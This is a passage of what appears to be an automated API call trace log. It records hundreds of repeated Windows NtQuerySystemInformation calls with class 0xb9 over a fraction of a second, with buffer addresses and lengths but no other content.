SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd60, Length=0x40, ResultLength=0x0) [0264.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.800] 